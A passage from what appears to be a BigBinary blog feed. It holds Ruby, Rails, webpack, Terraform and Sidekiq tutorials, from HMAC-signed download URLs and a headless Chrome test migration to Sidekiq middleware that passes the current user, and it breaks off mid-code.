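For completeness, the matching signed URL can be produced on the server with plain Ruby. This is a sketch of the scheme the worker above expects (HMAC-SHA256 over path + "/" + expiry, Base64-encoded, then URL-escaped); the method names `generate_verify_token` and `signed_url`, and the `download=1` placeholder parameter, are illustrative and not from the original setup:

```ruby
require "openssl"
require "base64"
require "cgi"

# Sketch: build the "<expiry>-<auth_code>" token that the worker verifies.
# The signed string is the URL path plus "/" plus the expiry timestamp,
# matching the worker's getFilePath(url) + "/" + getExpiryTimestamp(token).
def generate_verify_token(path, expiry_epoch, secret)
  signed_string = "#{path}/#{expiry_epoch}"
  digest = OpenSSL::HMAC.digest("SHA256", secret, signed_string)
  auth_code = CGI.escape(Base64.strict_encode64(digest))
  "#{expiry_epoch}-#{auth_code}"
end

# Append the token to a download URL, valid for ttl seconds.
# "download=1" is a hypothetical query param so the token follows
# "&verify=", which is the separator the worker splits on.
def signed_url(base_url, path, secret, ttl: 3600)
  expiry = Time.now.to_i + ttl
  "#{base_url}#{path}?download=1&verify=#{generate_verify_token(path, expiry, secret)}"
end
```

Because standard Base64 never contains `-`, the worker's `full_token.split("-")` cleanly separates the expiry from the URL-escaped auth code.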
    </entry><entry>
       <title><![CDATA[Replacing PhantomJS with headless Chrome]]></title>
       <author><name>Navaneeth PK</name></author>
      <link href="https://www.bigbinary.com/blog/replacing-phantomjs-with-headless-chrome"/>
      <updated>2019-01-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/replacing-phantomjs-with-headless-chrome</id>
      <content type="html"><![CDATA[<p>We recently replaced PhantomJS with ChromeDriver for system tests in a project, since <a href="https://github.com/ariya/phantomjs/issues/15344">PhantomJS is no longer maintained</a>. Many modern browser features required workarounds and hacks to work on PhantomJS. For example, the <code>Element.trigger('click')</code> method does not actually click an element but simulates a DOM click event. These workarounds meant that the code was not being tested as it would behave in a real production environment.</p><h4>ChromeDriver Installation &amp; Configuration</h4><p>ChromeDriver is needed to use Chrome as the browser for system tests. It can be installed on macOS using <a href="https://brew.sh">Homebrew</a>.</p><pre><code class="language-bash">brew cask install chromedriver</code></pre><p>Remove <code>poltergeist</code> from the Gemfile and add <code>selenium-webdriver</code>.</p><pre><code class="language-ruby"># Gemfile
- gem &quot;poltergeist&quot;
+ gem &quot;selenium-webdriver&quot;</code></pre><p>Configure Capybara to use ChromeDriver by adding the following snippet.</p><pre><code class="language-ruby">require 'selenium-webdriver'

Capybara.register_driver(:chrome_headless) do |app|
  args = []
  args &lt;&lt; 'headless' unless ENV['CHROME_HEADLESS']

  capabilities = Selenium::WebDriver::Remote::Capabilities.chrome(
    chromeOptions: { args: args }
  )

  Capybara::Selenium::Driver.new(
    app,
    browser: :chrome,
    desired_capabilities: capabilities
  )
end

Capybara.default_driver = :chrome_headless</code></pre><p>The above code runs tests in headless mode by default. For debugging purposes, we would like to see the actual browser.
That can easily be done by executing the following command.</p><pre><code class="language-shell">CHROME_HEADLESS=false bin/rails test:system</code></pre><p>After switching from PhantomJS to headless Chrome, we ran into many test failures due to differences in the implementation of the Capybara API when using ChromeDriver. Here are solutions to some of the issues we faced.</p><h4>1. Element.trigger('click') does not exist</h4><p><code>Element.trigger('click')</code> simulates a DOM event to click instead of actually clicking the element. This is a bad practice because the element might be obscured behind another element and still trigger the click. Selenium does not support this method. <code>Element.click</code> works as the solution, but it is not a drop-in replacement. We can replace <code>Element.trigger('click')</code> with <code>Element.send_keys(:return)</code> or by executing JavaScript to trigger the click event.</p><pre><code class="language-ruby"># example
find('.foo-link').trigger('click')

# solutions
find('.foo-link').click
# or
find('.foo-link').send_keys(:return)
# or
# if the link is not visible or is overlapped by another element
execute_script(&quot;$('.foo-link').click();&quot;)</code></pre><h4>2. Element is not visible to click</h4><p>When we switched to <code>Element.click</code>, some tests were failing because the element was not visible, as it was behind another element. The easiest fix for these failing tests was to use <code>Element.send_keys(:return)</code>, but the purpose of the test is to simulate a real user clicking the element. So we had to make sure the element was visible, and we fixed the UI issues which prevented the element from being visible.</p><h4>3. Setting the value of hidden fields does not work</h4><p>When we try to set the value of a hidden input field using the <code>set</code> method of an element, Capybara throws an <code>element not interactable</code> error.</p><pre><code class="language-ruby"># example
find(&quot;.foo-field&quot;, visible: false).set(&quot;some text&quot;)
# Error: element not interactable

# solution
page.execute_script('$(&quot;.foo-field&quot;).val(&quot;some text&quot;)')</code></pre><h4>4. Element.visible? returns false if the element is empty</h4><p>The <a href="https://www.rubydoc.info/gems/capybara/Capybara%2FSessionConfig:ignore_hidden_elements"><code>ignore_hidden_elements</code></a> option of Capybara is <code>true</code> by default. When <code>ignore_hidden_elements</code> is <code>true</code>, Capybara will only find elements which are visible on the page. Let's say we have <code>&lt;div class=&quot;empty-element&quot;&gt;&lt;/div&gt;</code> on our page. <code>find(&quot;.empty-element&quot;).visible?</code> returns <code>false</code> because Selenium considers empty elements invisible. This issue can be resolved by using <code>visible: :any</code>.</p><pre><code class="language-ruby"># example
# ignore hidden elements
Capybara.ignore_hidden_elements = true
find(&quot;.empty-element&quot;).visible?
# returns false

# solution
find('.empty-element', visible: :any)
# or
find('.empty-element', visible: :all)
# or
find('.empty-element', visible: false)</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#pick]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-pick"/>
      <updated>2019-01-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-pick</id>
      <content type="html"><![CDATA[<p>Before Rails 6, selecting only the first value for a column from a set of records was cumbersome. Let's say we want only the first name from all the posts with category &quot;Rails 6&quot;.</p><pre><code class="language-ruby">&gt;&gt; Post.where(category: &quot;Rails 6&quot;).limit(1).pluck(:name).first
   SELECT &quot;posts&quot;.&quot;name&quot; FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;category&quot; = ? LIMIT ?  [[&quot;category&quot;, &quot;Rails 6&quot;], [&quot;LIMIT&quot;, 1]]
=&gt; &quot;Rails 6 introduces awesome shiny features!&quot;</code></pre><p>In Rails 6, the new <a href="https://github.com/rails/rails/pull/31941">ActiveRecord::Relation#pick</a> method has been added, which provides a shortcut for selecting the first value.</p><pre><code class="language-ruby">&gt;&gt; Post.where(category: &quot;Rails 6&quot;).pick(:name)
   SELECT &quot;posts&quot;.&quot;name&quot; FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;category&quot; = ? LIMIT ?  [[&quot;category&quot;, &quot;Rails 6&quot;], [&quot;LIMIT&quot;, 1]]
=&gt; &quot;Rails 6 introduces awesome shiny features!&quot;</code></pre><p>This method <a href="https://github.com/rails/rails/blob/45b898afc07dca936df13795dd5179bff5ae9a90/activerecord/lib/active_record/relation/calculations.rb#L203-L219">internally applies</a> <code>limit(1)</code> on the relation before picking up the first value. So it is useful when the relation is already reduced to a single row.</p><p>It can also select values for multiple columns.</p><pre><code class="language-ruby">&gt;&gt; Post.where(category: &quot;Rails 6&quot;).pick(:name, :author)
   SELECT &quot;posts&quot;.&quot;name&quot;, &quot;posts&quot;.&quot;author&quot; FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;category&quot; = ? LIMIT ?  [[&quot;category&quot;, &quot;Rails 6&quot;], [&quot;LIMIT&quot;, 1]]
=&gt; [&quot;Rails 6.0 new features&quot;, &quot;prathamesh&quot;]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Target Tracking Policy for Auto Scaling]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/target-tracking-policy-for-auto-scaling"/>
      <updated>2019-01-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/target-tracking-policy-for-auto-scaling</id>
      <content type="html"><![CDATA[<p>In July 2017, AWS <a href="https://aws.amazon.com/about-aws/whats-new/2017/07/introducing-target-tracking-scaling-policies-for-auto-scaling/">introduced</a> Target Tracking Policy for Auto Scaling in EC2. It helps to auto scale based on metrics like Average CPU Utilization, load balancer requests per target, and so on. Simply stated, it scales resources up and down to keep the metric at a fixed value. For example, if the configured metric is Average CPU Utilization and the value is 60%, the Target Tracking Policy will launch more instances if the Average CPU Utilization goes beyond 60%. It will automatically scale down when the usage decreases. Target Tracking Policy works using a set of CloudWatch alarms which are set automatically when the policy is configured.</p><p>It can be configured in <code>EC2 -&gt; Auto Scaling Groups -&gt; Scaling Policies</code>.</p><p><img src="/blog_images/2019/target-tracking-policy-for-auto-scaling/ec2_target_tracking_policy.png" alt="EC2 Target Tracking Policy"></p><p>We can also configure a warm-up period so that it waits before launching more instances to keep the metric at the configured value.</p><p>Internally, we use terraform to manage AWS resources. 
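</p><p>Under the hood, target tracking behaves roughly like proportional control: it adjusts capacity so that the average metric stays near the target. As a back-of-the-envelope sketch (our own simplification in plain Ruby, not the exact CloudWatch algorithm), the desired capacity can be estimated like this:</p><pre><code class="language-ruby"># Rough sketch of the proportional rule behind target tracking:
# new_capacity ~= current_capacity * (current_metric / target_metric),
# clamped to the ASG min/max sizes.
def desired_capacity(current_capacity, current_metric, target_metric, min:, max:)
  estimate = (current_capacity * current_metric.to_f / target_metric).ceil
  estimate.clamp(min, max)
end

# 4 instances at 90% average CPU with a 60% target scale up to 6
desired_capacity(4, 90, 60, min: 2, max: 10) # => 6</code></pre><p>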
We can configure Target Tracking Policy using terraform as follows.</p><pre><code class="language-hcl">resource &quot;aws_launch_configuration&quot; &quot;web_cluster&quot; {
  name_prefix     = &quot;staging-web-cluster&quot;
  image_id        = &quot;&lt;image ID&gt;&quot;
  instance_type   = &quot;&lt;instance type&gt;&quot;
  key_name        = &quot;&lt;ssh key name&gt;&quot;
  security_groups = [&quot;&lt;security group&gt;&quot;]
  user_data       = &quot;&lt;user_data script&gt;&quot;

  root_block_device {
    volume_size = &quot;&lt;volume size&gt;&quot;
  }

  lifecycle {
    create_before_destroy = true
  }
}

resource &quot;aws_autoscaling_group&quot; &quot;web_cluster&quot; {
  name                      = &quot;staging-web-cluster-asg&quot;
  min_size                  = &quot;&lt;min ASG size&gt;&quot;
  max_size                  = &quot;&lt;max ASG size&gt;&quot;
  default_cooldown          = &quot;300&quot;
  launch_configuration      = &quot;${aws_launch_configuration.web_cluster.name}&quot;
  vpc_zone_identifier       = [&quot;&lt;subnet ID&gt;&quot;]
  health_check_type         = &quot;EC2&quot;
  health_check_grace_period = 300
  target_group_arns         = [&quot;&lt;target group arn&gt;&quot;]
}

resource &quot;aws_autoscaling_policy&quot; &quot;web_cluster_target_tracking_policy&quot; {
  name                      = &quot;staging-web-cluster-target-tracking-policy&quot;
  policy_type               = &quot;TargetTrackingScaling&quot;
  autoscaling_group_name    = &quot;${aws_autoscaling_group.web_cluster.name}&quot;
  estimated_instance_warmup = 200

  target_tracking_configuration {
    predefined_metric_specification {
      predefined_metric_type = &quot;ASGAverageCPUUtilization&quot;
    }
    target_value = &quot;60&quot;
  }
}</code></pre><p>Target Tracking Policy allows us to easily configure and manage auto scaling in EC2. It's particularly helpful while running services like web servers.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Migrating Gumroad from RequireJS to webpack]]></title>
       <author><name>Sharang Dashputre</name></author>
      <link href="https://www.bigbinary.com/blog/migrating-gumroad-from-requirejs-to-webpack"/>
      <updated>2018-12-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrating-gumroad-from-requirejs-to-webpack</id>
      <content type="html"><![CDATA[<p><em>BigBinary has been working with <a href="https://gumroad.com">Gumroad</a> for a while. The following blog post has been published with permission from Gumroad, and we are very grateful to <a href="https://twitter.com/shl">Sahil</a> for allowing us to discuss the work in such an open environment.</em></p><p>Gumroad is a JavaScript-heavy application, as most consumer-oriented applications are these days. We recently changed its JavaScript build system from <a href="https://requirejs.org/">RequireJS</a> to <a href="https://webpack.js.org/">webpack</a>. We'd like to talk about how we went about doing this.</p><p>Gumroad's web application is built using Ruby on Rails. The project was started way back in 2011, as <a href="https://news.ycombinator.com/item?id=2406614">this Hacker News post</a> suggests. When we began working on the code, it was building JavaScript assets through two systems: <a href="https://github.com/rails/sprockets">Sprockets</a> and RequireJS. From what we could tell, all the code which used a new (at the time) frontend framework was processed by RequireJS first and then Sprockets, whereas the JavaScript files usually present under <code>app/assets/javascripts</code> and <code>vendor/assets/javascripts</code> in a typical Rails application were present as well, but they were not being processed by RequireJS. Also, there were some libraries which were sourced using <a href="https://bower.io/">Bower</a>.</p><p>We were tasked with migrating the RequireJS build system over to webpack and replacing Bower with NPM. The reason behind this was that we wanted to use newer tools with wider community support. 
Another reason was that we wanted to be able to take advantage of all the goodies that webpack comes with, though that was not a strong motivation at that point.</p><p>We decided to break down the task into small pieces which could be worked on in iterations and, more importantly, could be shipped in iterations. This would enable us to work on other tasks in the application in parallel and not be blocked on a big chunk of work. Keeping that in mind, we split the task into three different steps.</p><p>Step 1: Migrate from RequireJS to webpack with the minimal amount of changes in the actual code.</p><p>Step 2: Use NPM packages in place of Bower components.</p><p>Step 3: Use NPM packages in place of libraries present under <code>vendor/assets/javascripts</code>.</p><h2>Step 1: Migrate from RequireJS to webpack with the minimal amount of changes in the actual code</h2><p>The first thing we did here was create a new <code>webpack.config.js</code> configuration file which would be used by webpack. We did our best to accurately translate the configuration from the RequireJS configuration file using multiple resources available online.</p><p>Here is how most JavaScript files which were to be processed by RequireJS looked.</p><pre><code class="language-javascript">&quot;use strict&quot;;

define([&quot;braintree&quot;, &quot;$app/ui/product/edit&quot;, &quot;$app/data/product&quot;], function (
  Braintree,
  ProductEditUI,
  ProductData
) {
  // Do something with Braintree, ProductEditUI, and ProductData
});</code></pre><p>As you can see, the code did not use the newer <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import">import</a> statements which you'd see in comparatively newer JavaScript code. As we've mentioned earlier, our goal was to have minimal code changes, so we did not want to change to <code>import</code> just yet. 
Luckily for us, webpack supports the <a href="https://github.com/amdjs/amdjs-api/wiki/AMD#define-function-">define API</a> for specifying dependencies. This meant that we would not need to change how dependencies were specified in any of the JavaScript files.</p><p>In this step we also changed the build system configuration (the webpack.config.js file in this case) to use NPM packages where possible instead of using libraries from the <code>vendor/</code> directory. This meant that we would need to have aliases in place for instances where the package name was different from the names we had aliased the libraries to.</p><p>For example, this is how the 'braintree' alias was set earlier in order to refer to the Braintree SDK. All the code had to do was mention that <code>braintree</code> was a dependency.</p><pre><code class="language-javascript">require.config({
  paths: {
    braintree: &quot;/vendor/assets/javascripts/braintree-2.16.0&quot;,
  },
});</code></pre><p>With the change to use the NPM package in place of the JavaScript file, dependency sourcing did not work as expected, because the NPM package name was 'braintree-web' while the source code was trying to load 'braintree', which was not known to the build system (webpack). In order to avoid making changes to source code, we used the <a href="https://webpack.js.org/configuration/resolve/#resolve-alias">&quot;alias&quot; feature</a> provided by webpack as shown below.</p><pre><code class="language-javascript">module.exports = {
  resolve: {
    alias: {
      braintree: &quot;braintree-web&quot;,
    },
  },
};</code></pre><p>We did this for all the dependencies which had been given an alias in the RequireJS configuration, and we got dependency resolution to work as expected.</p><p>As a part of this step, we also created a new common chunk and used it to improve caching. 
You can read more about this feature <a href="https://webpack.js.org/plugins/split-chunks-plugin/#split-chunks-example-1">here</a>. Note that we would tweak this iteratively later, but we thought it would be good to get started with the basic configuration right away.</p><h2>Step 2: Use NPM packages in place of Bower components</h2><p>Another goal of the migration was to remove Bower so as to make the build system simpler. The first reason was that all the Bower packages we were using were available as NPM packages. The second reason was that Bower itself has been recommending that users migrate to Yarn/webpack for a while now.</p><p>What we did here was simple. We removed Bower and the Bower configuration file. Then we sourced the required Bower components as NPM packages instead by adding them to <code>package.json</code>. We also removed the aliases added to source them from the webpack configuration.</p><p>For example, here's the change required to the configuration file after sourcing <code>clipboard</code> as an NPM package instead of a Bower component.</p><pre><code class="language-diff">resolve: {
  alias: {
    // Other Code
    $app:           path.resolve(__dirname, '../../app/javascript'),
    $lib:           path.resolve(__dirname, '../../lib/assets/javascripts')
-   clipboard:      path.resolve(__dirname, '../../vendor/assets/javascripts/clipboard.min.js')
  }
}</code></pre><h2>Step 3: Use NPM packages in place of libraries present under <code>vendor/assets/javascripts</code></h2><p>We had a lot of JavaScript libraries present under <code>vendor/assets/javascripts</code> which were sourced in the required JavaScript files. We deleted those files from the project and sourced them as NPM packages instead. This way we have better visibility and control over the versions of these packages.</p><p>As part of this migration we also did some asset-related cleanups. 
These included removing unused JavaScript files, including JavaScript files only where required instead of sourcing them into the global scope, and so on.</p><p>We continuously measured the performance of the application before and after applying changes to make sure that we were not worsening performance during the migration. In the end, we found that we had improved page load speeds by an average of 2%. Note that this task was not undertaken to improve the performance of the application. We are now planning to leverage webpack features and try to improve this metric further.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Active Record attributes API]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-attributes-api"/>
      <updated>2018-12-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-attributes-api</id>
      <content type="html"><![CDATA[<p>Rails 5 was a major release with a lot of new features like Action Cable, API Applications, etc. The Active Record attributes API was also part of the Rails 5 release, but it did not receive much attention.</p><p>The Active Record attributes API has been used by Rails internally for a long time. In Rails 5, the attributes API was made public and gained support for custom types.</p><h4>What is the attributes API?</h4><p>The attributes API converts an attribute value to an appropriate Ruby type. Here is what the syntax looks like.</p><pre><code class="language-ruby">attribute(name, cast_type, options)</code></pre><p>The first argument is the name of the attribute and the second argument is the cast type. The cast type can be <code>string</code>, <code>integer</code> or a custom type object.</p><pre><code class="language-ruby"># db/schema.rb
create_table :movie_tickets, force: true do |t|
  t.float :price
end

# without attribute API
class MovieTicket &lt; ActiveRecord::Base
end

movie_ticket = MovieTicket.new(price: 145.40)
movie_ticket.save!
movie_ticket.price   # =&gt; Float(145.40)

# with attribute API
class MovieTicket &lt; ActiveRecord::Base
  attribute :price, :integer
end

movie_ticket.price   # =&gt; 145</code></pre><p>Before using the attributes API, the movie ticket price was a float value, but after applying <code>attribute</code> on price, the value is typecast as an integer.</p><p>The database still stores the price as a float; this conversion happens only in Ruby land.</p><p>Now, we will typecast the movie <code>release_date</code> from <code>datetime</code> to <code>date</code> type.</p><pre><code class="language-ruby"># db/schema.rb
create_table :movies, force: true do |t|
  t.datetime :release_date
end

class Movie &lt; ActiveRecord::Base
  attribute :release_date, :date
end

movie.release_date # =&gt; Thu, 01 Mar 2018</code></pre><p>We can also add a default value for an attribute.</p><pre><code class="language-ruby"># db/schema.rb
create_table :movies, force: true do |t|
  t.string :license_number
end

class Movie &lt; ActiveRecord::Base
  attribute :license_number,
            :string,
            default: &quot;IN00#{Date.current.strftime('%Y%m%d')}00#{rand(100)}&quot;
end

# without attribute API, no default value for license number
Movie.new.license_number  # =&gt; nil

# with attribute API and a default value for license number
Movie.new.license_number  # =&gt; &quot;IN00201805250068&quot;</code></pre><h4>Custom Types</h4><p>Let's say we want people to rate a movie in percentage. Traditionally, we would do something like this.</p><pre><code class="language-ruby">class MovieRating &lt; ActiveRecord::Base
  TOTAL_STARS = 5

  before_save :convert_percent_rating_to_stars

  def convert_percent_rating_to_stars
    rating_in_percentage = rating.gsub(/\%/, '').to_f
    self.rating = (rating_in_percentage * TOTAL_STARS) / 100
  end
end</code></pre><p>With the attributes API we can create a custom type which is responsible for casting the percentage rating to a number of stars.</p><p>We have to define the <code>cast</code> method in the custom type class, which casts the given value to the expected output.</p><pre><code class="language-ruby"># db/schema.rb
create_table :movie_ratings, force: true do |t|
  t.integer :rating
end

# app/types/star_rating_type.rb
class StarRatingType &lt; ActiveRecord::Type::Integer
  TOTAL_STARS = 5

  def cast(value)
    if value.present? &amp;&amp; !value.kind_of?(Integer)
      rating_in_percentage = value.gsub(/\%/, '').to_i
      star_rating = (rating_in_percentage * TOTAL_STARS) / 100
      super(star_rating)
    else
      super
    end
  end
end

# config/initializers/types.rb
ActiveRecord::Type.register(:star_rating, StarRatingType)

# app/models/movie_rating.rb
class MovieRating &lt; ActiveRecord::Base
  attribute :rating, :star_rating
end</code></pre><h4>Querying</h4><p>The attributes API also supports the <code>where</code> clause. 
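</p><p>Before looking at <code>serialize</code>, the cast arithmetic above can be checked in isolation. The following is a standalone sketch (plain Ruby, no ActiveRecord) of what <code>StarRatingType#cast</code> computes:</p><pre><code class="language-ruby"># Standalone version of the percentage-to-stars conversion in StarRatingType#cast.
TOTAL_STARS = 5

def percent_to_stars(value)
  return value if value.is_a?(Integer)
  # '25.6%'.to_i == 25, and 25 * 5 / 100 == 1 in integer arithmetic
  (value.gsub(/%/, '').to_i * TOTAL_STARS) / 100
end

percent_to_stars('25.6%') # => 1
percent_to_stars('80%')   # => 4
percent_to_stars(3)       # => 3</code></pre><p>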
Query will be converted to SQL by calling the <code>serialize</code> method on the type object.</p><pre><code class="language-ruby">class StarRatingType &lt; ActiveRecord::Type::Integer
  TOTAL_STARS = 5

  def serialize(value)
    if value.present? &amp;&amp; !value.kind_of?(Integer)
      rating_in_percentage = value.gsub(/\%/, '').to_i
      star_rating = (rating_in_percentage * TOTAL_STARS) / 100
      super(star_rating)
    else
      super
    end
  end
end

# Add a new movie rating with the rating as 25.6%.
# So the movie rating in stars will be 1 of 5 stars.
movie_rating = MovieRating.new(rating: &quot;25.6%&quot;)
movie_rating.save!
movie_rating.rating   # =&gt; 1

# Querying with the rating in percentage, 25.6%
MovieRating.where(rating: &quot;25.6%&quot;)
# =&gt; #&lt;ActiveRecord::Relation [#&lt;MovieRating id: 1000, rating: 1 ... &gt;]&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Passing current_user by default in Sidekiq]]></title>
       <author><name>Ashish Gaur</name></author>
      <link href="https://www.bigbinary.com/blog/passing-current-user-by-default-in-sidekiq"/>
      <updated>2018-12-05T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/passing-current-user-by-default-in-sidekiq</id>
      <content type="html"><![CDATA[<p>In one of our projects we need to capture user activity throughout the application. For example, when a user updates the projected distance of a delivery, the application should create an activity for that action. To create an activity we need the currently logged in user's id, since we need to associate the activity with that user.</p><p>We are using the <code>devise</code> gem for authentication, which provides the <code>current_user</code> method to controllers by default. Any business logic residing at the controller level can use <code>current_user</code> to associate the activity with the logged in user. However, some business logic resides in Sidekiq jobs, where <code>current_user</code> is not available.</p><h2>Passing <code>current_user</code> to a Sidekiq job</h2><p>One way to solve this issue is to pass the <code>current_user</code> directly to the Sidekiq job. Here's how we can do it.</p><pre><code class="language-ruby">class DeliveryController &lt; ApplicationController
  def update
    # update attributes
    DeliveryUpdateWorker.
      perform_async(params[:delivery], current_user.login)
    # render delivery
  end
end</code></pre><pre><code class="language-ruby">class DeliveryUpdateWorker
  include Sidekiq::Worker

  def perform(delivery, user_login)
    user = User.find_by(login: user_login)
    ActivityGenerationService.new(delivery, user) if user
  end
end</code></pre><p>That works. Now let's say we add another endpoint in which we need to track when a delivery is deleted. Here's the updated code.</p><pre><code class="language-ruby">class DeliveryController &lt; ApplicationController
  def update
    # update attributes
    DeliveryUpdateWorker.
      perform_async(params[:delivery], current_user.login)
    # render delivery
  end

  def destroy
    # delete attributes
    DeliveryDeleteWorker.
      perform_async(params[:delivery], current_user.login)
    # render :ok
  end
end</code></pre><pre><code class="language-ruby">class DeliveryDeleteWorker
  include Sidekiq::Worker

  def perform(delivery, user_login)
    user = User.find_by(login: user_login)
    ActivityGenerationService.new(delivery, user) if user
  end
end</code></pre><p>Again we needed to pass the <code>current_user</code> login in the new endpoint. You can notice a pattern here: for each endpoint which needs to track activity, we need to pass <code>current_user</code>. What if we could pass the <code>current_user</code> info by default?</p><p>The main reason we want to pass <code>current_user</code> by default is that we track model attribute changes in the models' <code>before_save</code> callbacks.</p><p>For this we store the <code>current_user</code> info in <code>Thread.current</code> and access it in the <code>before_save</code> callbacks of the model which generates the relevant activity.</p><p>This works fine for model attribute changes made in controllers and services, where <code>Thread.current</code> is accessible and persisted. However, for Sidekiq jobs which change the model attributes whose activity is generated, we need to pass the <code>current_user</code> manually, since the request's <code>Thread.current</code> is not available inside Sidekiq jobs.</p><p>Again, one could argue that we don't need to pass the <code>current_user</code> by default and can instead pass it to each Sidekiq job as an argument. This works in simple cases, but more complex cases require extra effort.</p><p>For example, let's say we're tracking a delivery's cost. We have three Sidekiq jobs: <code>DeliveryDestinationChangeWorker</code>, <code>DeliveryRouteChangeWorker</code> and <code>DeliveryCostChangeWorker</code>. We call <code>DeliveryDestinationChangeWorker</code>, which changes the destination of a delivery. This calls <code>DeliveryRouteChangeWorker</code>, which calculates the new route and calls <code>DeliveryCostChangeWorker</code>. 
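</p><p>To make the <code>Thread.current</code> limitation concrete, here is a dependency-free sketch (plain Ruby, not our application code). A value stored in <code>Thread.current</code> is visible later in the same thread, but not in a newly spawned thread; this is essentially why a Sidekiq worker cannot see what the web request thread stored.</p><pre><code class="language-ruby"># Thread-local storage does not cross thread boundaries.
Thread.current[:request_user_login] = 'sam'

Thread.current[:request_user_login]                      # => 'sam'
Thread.new { Thread.current[:request_user_login] }.value # => nil</code></pre><p>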
Now <code>DeliveryCostChangeWorker</code> changes the delivery cost, where the <code>before_save</code> callback is called.</p><p>In this example you can see that we would need to pass <code>current_user</code> through all three Sidekiq workers and initialize <code>Thread.current</code> in <code>DeliveryCostChangeWorker</code>. The nesting can go much deeper.</p><p>Passing <code>current_user</code> by default makes sure that if the activity is generated in a model's <code>before_save</code> callback, it can access the <code>current_user</code> info from <code>Thread.current</code> no matter how deeply nested the Sidekiq call chain is.</p><p>It also makes sure that if a developer adds another Sidekiq worker class in the future which changes a model whose attribute changes need to be tracked, the developer need not remember to pass <code>current_user</code> explicitly to the Sidekiq worker.</p><p>Note that the problem presented in this blog is an oversimplified version, in order to better present the solution.</p><h2>Creating a wrapper module to include <code>current_user</code> by default</h2><p>The most basic way to pass <code>current_user</code> by default is to create a wrapper module. This module is responsible for adding the <code>current_user</code> when <code>perform_async</code> is invoked. Here's an example.</p><pre><code class="language-ruby">module SidekiqMediator
  def perform_async(klass, *args)
    args.push(current_user.login)
    klass.send(:perform_async, *args)
  end
end</code></pre><pre><code class="language-ruby">class DeliveryController &lt; ApplicationController
  include SidekiqMediator

  def update
    # update attributes
    perform_async(DeliveryUpdateWorker, params[:delivery])
    # render delivery
  end

  def destroy
    # delete attributes
    perform_async(DeliveryDeleteWorker, params[:delivery])
    # render :ok
  end
end</code></pre><pre><code class="language-ruby">class DeliveryDeleteWorker
  include Sidekiq::Worker

  def perform(delivery, user_login)
    user = User.find_by(login: user_login)
    ActivityGenerationService.new(delivery, user) if user
  end
end</code></pre><p>Now we don't need to pass the <code>current_user</code> login in each call. However, we still need to remember to include <code>SidekiqMediator</code> wherever we need <code>current_user</code> in a Sidekiq job for activity generation. Another way to solve this problem is to intercept the Sidekiq job before it is pushed to Redis; then we can include the <code>current_user</code> login by default.</p><h2>Using Sidekiq client middleware to pass <code>current_user</code> by default</h2><p>Sidekiq provides a client middleware to run custom logic before pushing a job to Redis. We can use the client middleware to push <code>current_user</code> as a default argument in the Sidekiq arguments. Here's an example of a Sidekiq client middleware.</p><pre><code class="language-ruby">class SidekiqClientMiddleware
  def call(worker_class, job, queue, redis_pool = nil)
    # Do something before pushing the job to Redis
    yield
  end
end</code></pre><p>We need a way to introduce <code>current_user</code> into the Sidekiq arguments. The <a href="https://github.com/mperham/sidekiq/wiki/Job-Format">job</a> payload contains the arguments passed to the Sidekiq worker. Here's what the <code>job</code> payload looks like.</p><pre><code class="language-json">{
  &quot;class&quot;: &quot;DeliveryDeleteWorker&quot;,
  &quot;jid&quot;: &quot;b4a577edbccf1d805744efa9&quot;,
  &quot;args&quot;: [1, &quot;arg&quot;, true],
  &quot;created_at&quot;: 1234567890,
  &quot;enqueued_at&quot;: 1234567890
}</code></pre><p>Notice the <code>args</code> key, an array containing the arguments passed to the Sidekiq worker. We can push the <code>current_user</code> onto the <code>args</code> array. This way each Sidekiq job will have <code>current_user</code> as the last argument by default. Here's the modified version of the client middleware which includes 
<code>current_user</code> by default.</p><pre><code class="language-ruby">class SidekiqClientMiddleware
  def call(_worker_class, job, _queue, _redis_pool = nil)
    # Push the current user login as the last argument by default
    job['args'].push(current_user.login)
    yield
  end
end</code></pre><p>Now we don't need to pass the <code>current_user</code> login to Sidekiq workers in the controller. Here's how our controller logic looks now.</p><pre><code class="language-ruby">class DeliveryController &lt; ApplicationController
  def update
    # update attributes
    DeliveryUpdateWorker.perform_async(params[:data])
    # render delivery
  end

  def destroy
    # delete attributes
    DeliveryDeleteWorker.perform_async(params[:data])
    # render :ok
  end
end</code></pre><p>We don't need <code>SidekiqMediator</code> anymore. The <code>current_user</code> is automatically included as the last argument in every Sidekiq job.</p><p>There is one issue here, though. We included <code>current_user</code> by default in every Sidekiq worker. This means workers which do not expect <code>current_user</code> as an argument will also get <code>current_user</code> as their last argument, which will raise <code>ArgumentError: wrong number of arguments (2 for 1)</code>. Here's an example.</p><pre><code class="language-ruby">class DeliveryCreateWorker
  include Sidekiq::Worker

  def perform(data)
    # doesn't use current_user login to track activity when called;
    # this will get data, current_user_login as the arguments
  end
end</code></pre><p>To solve this we need to extract the <code>current_user</code> argument from <code>job['args']</code> before the worker starts processing.</p><h2>Using Sidekiq server middleware to extract <code>current_user</code> login</h2><p>Sidekiq also provides a server middleware which runs before processing any Sidekiq job. We used this to extract <code>current_user</code> from <code>job['args']</code> and save it in a global state.</p><p>This 
global state should persist after the server middleware execution is complete and the actual Sidekiq job processing has started. Here's the server middleware.</p><pre><code class="language-ruby">class SidekiqServerMiddleware
  def call(_worker, job, _queue)
    set_request_user(job['args'].pop)
    yield
  end

  private

  def set_request_user(request_user_login)
    RequestStore.store[:request_user_login] = request_user_login
  end
